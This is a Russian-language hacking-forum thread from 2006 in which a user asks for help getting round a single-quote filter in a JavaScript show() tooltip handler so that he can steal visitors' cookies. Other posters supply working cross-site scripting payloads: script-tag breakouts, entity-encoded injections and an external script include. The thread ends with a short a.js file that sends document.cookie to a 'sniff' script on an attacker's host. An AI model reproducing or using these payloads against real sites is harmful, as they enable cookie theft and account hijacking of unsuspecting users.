Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Проблема в JavaScripts... Возможно ли такое? (https://forum.antichat.xyz/showthread.php?t=12481)

FoGorm 05.01.2006 01:53
Проблема в JavaScripts... Возможно ли такое?
 
Есть такая функция вывода текста:
function show(text) {
var s;
s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>';
hint1.innerHTML=s;
SetPosition();
hint1.style.visibility='visible';
}

Она выводит на экран текст таким образом
onmouseover="show('ТЕКСТ');"

Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie);) если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на ‘ Также розрешается использовать любые символы вида &quot; , &amp; , &lt; и т.к.
P.S. Если допускалось использование одинарной кавчки, я бы сделал так
onmouseover="show('ТЕКСТ');alert(document.coo kie);('');", т.е. просто бы вставил ');alert(document.cookie);('

Но увы так нельзя... поэтому пришлось обращаться к вам за помощью :(

FoGorm 05.01.2006 02:40
Уже нашел одно из решений, но всерано не могу добиться главного:
Вот такое проходит: </script><img src=javascript:alert(document.cookie);><script>
Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот:
</script><img src=javascript:document.images[0].src=http://adress/sniff.php?+document.cookie;><script>
Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя :(

FoGorm 05.01.2006 23:34
хана.. что за форум.. одно молчание :(

Abra 05.01.2006 23:47
src="http://adress/sniff.php?"+document.cookie;>
так попробуй. Двойные ковычки то использывать можно?

Algol 05.01.2006 23:58
Масса способов.
Например
</script><img src=javascript:document.images[0].src=&quot;http://adress/sniff.php?+document.cookie;&quot;><script>

А вообще см. http://antichat.ru/crackchat/HTML/
Там все есть.

FoGorm 06.01.2006 00:01
думаю двойные кавчки здесь не выход.. т.к. елси поставить двойную кавычку, то она закроет onmouseover=" вот эту.. но этого делать нельзя(

FoGorm 06.01.2006 00:23
&lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+document....&lt;script&gt;

В итогде это все работает, но там стоит ограничение на кол-во символов.. так что если возможно.. то нужно сделать длинной не больше чем &lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+... вот посюда оно его обрезает.. последний штрих :)

Algol 06.01.2006 00:27
</script><script src=http://blablabla.ru/a.js></script>

FoGorm 06.01.2006 00:33
Если можешь, напиши содержимое .js файла.. а то я плохо в яве розбираюсь, но то что ты предложил понял, и мне это видимо подходит...

Algol 06.01.2006 00:40
a.js :
Код:
i = new Image();
i.src="http://mysite.ru/sniff.pl?"+document.cookie;


Время: 14:09
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице